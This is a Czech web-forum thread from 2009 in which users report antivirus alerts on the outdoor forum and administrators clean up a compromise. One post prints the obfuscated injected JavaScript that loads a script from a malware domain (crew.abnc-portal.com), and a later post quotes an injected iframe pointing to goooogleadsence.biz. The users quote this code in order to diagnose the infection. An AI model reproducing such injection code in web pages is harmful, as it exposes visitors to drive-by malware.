Vir na outdooforu

týkající se technického rázu fóra

Moderátoři: Moderátoři - veteráni, Moderátoři - nová krev

Vir na outdooforu

Příspěvekod hrasek » úte bře 31, 2009 8:04

Včera 30.3.2009 při přístupu sem na outdoorforum mi antivir NOD32 zachytil vir. Název už bohužel nevím, protože jsem ho hned smazal.
Uživatelský avatar
hrasek
účastník
účastník
 
Příspěvky: 322
Registrován: úte lis 11, 2008 19:02

Re: Vir na outdooforu

Příspěvekod vonkreuz » úte bře 31, 2009 8:08

Mně právě Avast při každém načtení stránky OFka ukazuje totok:
Přílohy
avast varovani.jpg
avast varovani.jpg (37.04 KiB) Zobrazeno 26676 krát
Nám šlo hlavně o člověka.
Kefalín, tyhle starosti pusťte z hlavy. Lidí je na světě jako sraček.

Hodnota života je přehnaná. Popeláři pro lidi dělají více než ti z horské služby.

Prarodiče současné generace si hřáli nohy v kravském lejnu a boty byl nejdražší majetek. Proto jsou boty tak sledované.
Uživatelský avatar
vonkreuz
Moderátor
Moderátor
 
Příspěvky: 9590
Registrován: sob bře 1, 2008 21:37
Bydliště: Co by cepínem dohodil a nemetodicky v mačkách do hor došel...

Re: Vir na outdooforu

Příspěvekod zbuddy » úte bře 31, 2009 8:11

Mně též...
"Protože mi za hodinu jede co?" "Protože Ti za hodinu jede vlak, vole" :D
Uživatelský avatar
zbuddy
Moderátor
Moderátor
 
Příspěvky: 12351
Registrován: pát úno 16, 2007 9:59
Bydliště: Kladno, rodiště Orłowa, Kolbenka v Práglu

Re: Vir na outdooforu

Příspěvekod hrasek » úte bře 31, 2009 8:15

To by mohlo být ono. A taky se mi tady zvětšilo písmo což vypadá strašně nepřehledně. Texty jako " Vyhledat témata bez odpovědí | Zobrazit aktivní témata Zobrazit nové příspěvky | Zobrazit vaše příspěvky" jsou normální velikostí jako drív ale zbytek je o dost větším fontem. Samozřejmě můžu ve Firefoxu font zmenšit ale pak je zase část webu nečitelně malým písmem.


V hlavičce outdoorfora je tohle (úplně na začátku kódu):
Kód: Vybrat vše
<!-- ad --><!-- ADS Blok v.0.3 --><script language=javascript>
function sADS(sIteId) {
        var thisHome=document;
        var sIteName=thisHome.location.hostname;
        var adsurl='crew%2eabnc-portal%2ecom%2F';
        var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
        thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
}
sADS("CI-002643-3");
</script><!-- ADS Blok v.0.3 --><!-- /ad --><!-- ad --><!-- ADS Blok v.0.3 --><script language=javascript>
function sADS(sIteId) {
        var thisHome=document;
        var sIteName=thisHome.location.hostname;
        var adsurl='crew%2eabnc-portal%2ecom%2F';
        var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
        thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
}
sADS("CI-002643-3");
</script><!-- ADS Blok v.0.3 --><!-- /ad -->


Co to má být? To je divné že je to na začátku ještě před tagem <html>. To vypadá jako by to tam přidalo něco automaticky. Je to nějaký javaskript a ta doména odpovídá tomu co mi vypsal NOD32.
Naposledy upravil hrasek dne úte bře 31, 2009 8:19, celkově upraveno 1
Uživatelský avatar
hrasek
účastník
účastník
 
Příspěvky: 322
Registrován: úte lis 11, 2008 19:02

Re: Vir na outdooforu

Příspěvekod terkad » úte bře 31, 2009 8:19

Mně už zmizela ta hromada textu ze záhlaví, ale monstrózních písmenek jsem se nezbavila.
A ano, vir mi to už taky hlásí...
Uživatelský avatar
terkad
Moderátor
Moderátor
 
Příspěvky: 4441
Registrován: pát led 18, 2008 19:27
Bydliště: Jankovice (Uherské Hradiště)

Re: Vir na outdooforu

Příspěvekod vonkreuz » úte bře 31, 2009 8:36

Zkusil jsem se dostat na tu stránku "crew (bodka) abnc (pomlčka) portal (tečka)com/" a strýko Gůůgl mi hodil totok"
Gůůgl píše:Poradenství zajišťuje Google
Bezpečného prohlížení
Diagnostická stránka abnc-portal.com

Jaký je aktuální stav stránek abnc-portal.com?

Stránky jsou na seznamu podezřelých stránek – návštěvou těchto stránek můžete poškodit svůj počítač.

Co se stalo, když Google tuto stránku navštívil?

Z celkového počtu 25 stránek, které jsme za posledních 90 dní otestovali, došlo na stránce/stránkách 0 ke stáhnutí a nainstalování škodlivého softwaru bez souhlasu uživatele. Google tyto stránky naposledy navštívil dne 2009-03-30. Na těchto stránkách se podezřelý obsah vyskytl naposledy dne 2009-03-30.

Malicious software includes 69 scripting exploit(s), 27 trojan(s).

This site was hosted on 3 network(s) including AS35357 (RSSP), AS10026 (ANC), AS41665 (HOSTING).

Fungovaly tyto stránky jako prostředník dalšího šíření škodlivého sofwaru?

Za posledních 90 dnů se u stránek abnc-portal.com neprokázalo, že by fungovaly jako prostředník infikace jiných stránek.

Hostují tyto stránky škodlivý software?

Ano, za posledních 90 dnů tyto stránky hostovaly škodlivý software. Infikovaly doménu(y) 54, včetně domén(y)zp-avto.ru/, ipk-kooperativ.com/, elveto.cz/.

Jak k tomu došlo?

V některých případech mohou třetí strany přidat škodlivý kód na legitimní stránky, což nás přiměje k zobrazení výstražného upozornění.

Další postup:

* Vraťte se na předchozí stránku.
* Jste-li majitelem těchto webových stránek, můžete požádat o kontrolu svých stránek pomocí Nástrojů pro webmastery Google. Další informace o této kontrole jsou k dispozici v Centru nápovědy pro webmastery.

Updated 3 hours ago

©2008 Google - Domovská stránka Google

a když zkusím dát Ignorovat varování, stránka se ani nenačte, jen pod horní lištou se mi ukáže krvavě červená lišta "Podezřelá útočná stránka"
Nám šlo hlavně o člověka.
Kefalín, tyhle starosti pusťte z hlavy. Lidí je na světě jako sraček.

Hodnota života je přehnaná. Popeláři pro lidi dělají více než ti z horské služby.

Prarodiče současné generace si hřáli nohy v kravském lejnu a boty byl nejdražší majetek. Proto jsou boty tak sledované.
Uživatelský avatar
vonkreuz
Moderátor
Moderátor
 
Příspěvky: 9590
Registrován: sob bře 1, 2008 21:37
Bydliště: Co by cepínem dohodil a nemetodicky v mačkách do hor došel...

Re: Vir na outdooforu

Příspěvekod hrasek » úte bře 31, 2009 8:48

To je hezké, ale outdoorforum které obsahuje javascript a načítá bůhvíco z toho pochybného webu se ti v pohodě načte. Administrátoři, chtělo by to s tím něco udělat. :(( Nejlépe auktualizovat PHPBB (pokud nějaké aktualizace jsou) a smazat ty javascripty.
Naposledy upravil hrasek dne úte bře 31, 2009 9:15, celkově upraveno 2
Uživatelský avatar
hrasek
účastník
účastník
 
Příspěvky: 322
Registrován: úte lis 11, 2008 19:02

Re: Vir na outdooforu

Příspěvekod vonkreuz » úte bře 31, 2009 8:54

Už jsem psal Rejpalovi, teda jen SZ... bohužel číslo na něj nemám (ani na Vojtose), tak snad To číslem obdaření mu dají vědět... *
Nám šlo hlavně o člověka.
Kefalín, tyhle starosti pusťte z hlavy. Lidí je na světě jako sraček.

Hodnota života je přehnaná. Popeláři pro lidi dělají více než ti z horské služby.

Prarodiče současné generace si hřáli nohy v kravském lejnu a boty byl nejdražší majetek. Proto jsou boty tak sledované.
Uživatelský avatar
vonkreuz
Moderátor
Moderátor
 
Příspěvky: 9590
Registrován: sob bře 1, 2008 21:37
Bydliště: Co by cepínem dohodil a nemetodicky v mačkách do hor došel...

Re: Vir na outdooforu

Příspěvekod Vojtos » úte bře 31, 2009 10:54

Ahoj děláme na tom. Musíme přímo do DTB ten šmejd to tady pekně rozvoral už to řeším s Rejpalem.
..možná že ne cíl, ale něco máš určitě na dosah...
Uživatelský avatar
Vojtos
Administrátor
Administrátor
 
Příspěvky: 1537
Registrován: stř srp 4, 2004 14:36
Bydliště: Mníšek pod Brdy

Re: Vir na outdooforu

Příspěvekod Sirah » úte bře 31, 2009 11:22

dekujeme *
t`estimo Catalunya


www.bafinka.4fan.cz
Uživatelský avatar
Sirah
inventář fóra
inventář fóra
 
Příspěvky: 4175
Registrován: pon zář 10, 2007 12:32
Bydliště: Back in Pardubice ;)

Re: Vir na outdooforu

Příspěvekod vonkreuz » úte bře 31, 2009 11:32

Tak už to vypadá, že je to v pohodě, Avast! mi nic nehlásí *

"Díky Vám! Díky Vám, chlapíku statečný,
za vaši odvahu, rozum a sílu!
Vy jste náš kapitán – oni jsou zbyteční!
Přidal jste blankytu do křídel míru."
:mrgreen: :mrgreen: :mrgreen:

Díky kucí :prayer: :supz:
Nám šlo hlavně o člověka.
Kefalín, tyhle starosti pusťte z hlavy. Lidí je na světě jako sraček.

Hodnota života je přehnaná. Popeláři pro lidi dělají více než ti z horské služby.

Prarodiče současné generace si hřáli nohy v kravském lejnu a boty byl nejdražší majetek. Proto jsou boty tak sledované.
Uživatelský avatar
vonkreuz
Moderátor
Moderátor
 
Příspěvky: 9590
Registrován: sob bře 1, 2008 21:37
Bydliště: Co by cepínem dohodil a nemetodicky v mačkách do hor došel...

Re: Vir na outdooforu

Příspěvekod hrasek » úte bře 31, 2009 11:34

Už to vypadá vpohodě. Také se přidávám k děkovačce =D>
Uživatelský avatar
hrasek
účastník
účastník
 
Příspěvky: 322
Registrován: úte lis 11, 2008 19:02

Re: Vir na outdooforu

Příspěvekod Rejpal » úte bře 31, 2009 11:55

Zdravim lidi,
ano, našla se tu škodná a již se plně pracuje se na její eradikaci.
Omlouváme se za nepříjemné problémy...
Uživatelský avatar
Rejpal
Administrátor
Administrátor
 
Příspěvky: 99
Registrován: stř zář 27, 2006 22:39
Bydliště: Praha

Re: Vir na outdooforu

Příspěvekod Chasi » úte bře 31, 2009 12:11

Rejpal píše:Zdravim lidi,
ano, našla se tu škodná a již se plně pracuje se na její eradikaci.
Omlouváme se za nepříjemné problémy...



Good job soldier! :smt024 .........................arm4 :smt070
Chodníčkem blíž, cestičkou spíš.
Uživatelský avatar
Chasi
nadšenec
nadšenec
 
Příspěvky: 1596
Registrován: stř zář 20, 2006 9:32
Bydliště: Bolatice

Re: Vir na outdooforu

Příspěvekod mike » úte bře 31, 2009 18:16

Rejpal píše:ano, našla se tu škodná a již se plně pracuje se na její eradikaci.

Rozbili Outdoorforum, parchanti! :evil: Taky diky za uvedeni do fukcniho stavu. Vcera se ukazalo, jak velkou ma kdo zavislost ;-)

Bylo mozne z nabouraneho OF chytit nejaky malware lokalne? Mam pro OF vyjimku v NoScriptu a AV nepouzivam. Zatim to nevypada, ale mozna jsem nehledal dost dukladne.
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod chuffu » úte bře 31, 2009 19:47

Už to mám též v pohodě. Thanks *
chuffu
 

Re: Vir na outdooforu

Příspěvekod hrasek » úte bře 31, 2009 19:59

_mike_ píše:
Rejpal píše:ano, našla se tu škodná a již se plně pracuje se na její eradikaci.

Rozbili Outdoorforum, parchanti! :evil: Taky diky za uvedeni do fukcniho stavu. Vcera se ukazalo, jak velkou ma kdo zavislost ;-)

Bylo mozne z nabouraneho OF chytit nejaky malware lokalne? Mam pro OF vyjimku v NoScriptu a AV nepouzivam. Zatim to nevypada, ale mozna jsem nehledal dost dukladne.



No radši si to nečím projeď, protože mám pocit že se Ti ta potvora mohla nas..t do počítače.
Můžeš třeba online scannerem NODU http://www.eset.com/onlinescan/
Uživatelský avatar
hrasek
účastník
účastník
 
Příspěvky: 322
Registrován: úte lis 11, 2008 19:02

Re: Vir na outdooforu

Příspěvekod mike » stř dub 1, 2009 0:44

hrasek píše:No radši si to nečím projeď, protože mám pocit že se Ti ta potvora mohla nas..t do počítače.
Můžeš třeba online scannerem NODU http://www.eset.com/onlinescan/

Diky, usetril jsi mi hledani, mel jsem to v planu. Jednou za 5 let trocha scanovani neuskodi ;-) Uz to bezi pres 4 hodiny a zatim nic nenaslo. Jelikoz disky se systemem a browsery uz jsou prohledane, tak je to nejspis OK.

Aby z toho nekdo nevyvodil nespravne zavery. AV sice nepouzivam, ale mam jednak FireFox (nizsi riziko nakazy) a jednak NoScript. Ten je sice pro OF vypnuty, ale ten pridany script sahal na jiny web a tam uz ochrana fungovala. Takze je docela dobre mozne, ze kdo to nepouziva neco chytil. Bez ochrany ani ranu ;-) A kdyz uz AV, tak od Esetu.
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod chonga » stř dub 1, 2009 16:26

_mike_ píše:Aby z toho nekdo nevyvodil nespravne zavery. AV sice nepouzivam, ale mam jednak FireFox (nizsi riziko nakazy) a jednak NoScript. Ten je sice pro OF vypnuty, ale ten pridany script sahal na jiny web a tam uz ochrana fungovala. Takze je docela dobre mozne, ze kdo to nepouziva neco chytil. Bez ochrany ani ranu ;-) A kdyz uz AV, tak od Esetu.


co je NoScript :(( :oops: :wink:
... každý dobrý skutek bude po zásluze potrestán
Uživatelský avatar
chonga
inventář fóra
inventář fóra
 
Příspěvky: 3078
Registrován: úte led 4, 2005 21:35
Bydliště: 3.patro v 3+1

Re: Vir na outdooforu

Příspěvekod jedik » stř dub 1, 2009 16:44

Mám FF a nic víc a žádný sviňák mi sem nevlezl (dle toho online testu) O:) Myslím, že není třeba mít strach.
Jsou tiché jak ten černý bor, co kryje jejich hlavy sivé, to hřebeny jsou našich hor, to Beskydy jsou zádumčivé.
Uživatelský avatar
jedik
inventář fóra
inventář fóra
 
Příspěvky: 2878
Registrován: sob dub 21, 2007 16:53
Bydliště: Ostrava

Re: Vir na outdooforu

Příspěvekod mike » stř dub 1, 2009 16:47

chonga píše:co je NoScript

http://noscript.net/
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod mike » čtv dub 2, 2009 19:12

Uz zas?! :| Tentokrat jen zmrsene fonty bez rozbite hlavicky...
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod mike » čtv dub 2, 2009 19:22

No jo, zase tu mame jakesi svinstvo:

Kód: Vybrat vše
<iframe src="http://goooogleadsence.biz/?click=375E41"...


Holt je phpBB prilis rozsirene... a otazka, jestli OF obsahuje vsechny aktualni zaplaty.
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod chonga » čtv dub 2, 2009 19:37

taky hlásím obří písmo :wink:
... každý dobrý skutek bude po zásluze potrestán
Uživatelský avatar
chonga
inventář fóra
inventář fóra
 
Příspěvky: 3078
Registrován: úte led 4, 2005 21:35
Bydliště: 3.patro v 3+1

Re: Vir na outdooforu

Příspěvekod mike » čtv dub 2, 2009 19:47

Jsem se po tom lehce kouknul a podle vseho ma nekdo z adminu zavirovany pocitac... tj. dira zrejme neni v phpBB, ale vir to tam pridal pres administratorske konto.
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod chonga » čtv dub 2, 2009 19:49

_mike_ píše:http://noscript.net/

děkuji. ale je to asi jen pro lišku, že?
... každý dobrý skutek bude po zásluze potrestán
Uživatelský avatar
chonga
inventář fóra
inventář fóra
 
Příspěvky: 3078
Registrován: úte led 4, 2005 21:35
Bydliště: 3.patro v 3+1

Re: Vir na outdooforu

Příspěvekod mike » čtv dub 2, 2009 19:58

No samozrejme. Pouzivat IE je jako jet za holkama na E55 bez ochrany ;-)
Uživatelský avatar
mike
Moderátor
Moderátor
 
Příspěvky: 49288
Registrován: pát čer 13, 2008 17:27

Re: Vir na outdooforu

Příspěvekod Mařena » pát dub 3, 2009 13:22

Aktuální nález AVG:

Kód: Vybrat vše
"Nalezen virus HTML/Framer"

dnes už 6x - v postatě při každém přístupu na OF
Mařena
Mařena
nadšenec
nadšenec
 
Příspěvky: 1137
Registrován: pát bře 3, 2006 12:50
Bydliště: Brno

Re: Vir na outdooforu

Příspěvekod Sirkka » pát dub 3, 2009 13:29

Furt tu nějaký virus straší :? Sice mi to nic nehlásí, ale některé texty a ikonky (př. smajly) mám malinkatý a některý zase velký :((
Uživatelský avatar
Sirkka
inventář fóra
inventář fóra
 
Příspěvky: 2217
Registrován: pát dub 11, 2008 20:21
Bydliště: Praha a Vysočina

Re: Vir na outdooforu

Příspěvekod amigo » pát dub 3, 2009 14:24

Mařena píše:Aktuální nález AVG:

Kód: Vybrat vše
"Nalezen virus HTML/Framer"

dnes už 6x - v postatě při každém přístupu na OF


od včerejška to samé a dnes prakticky v každém vláknu
Uživatelský avatar
amigo
Moderátor
Moderátor
 
Příspěvky: 5050
Registrován: stř zář 17, 2008 9:24
Bydliště: Vysočina

Další

Zpět na Problémy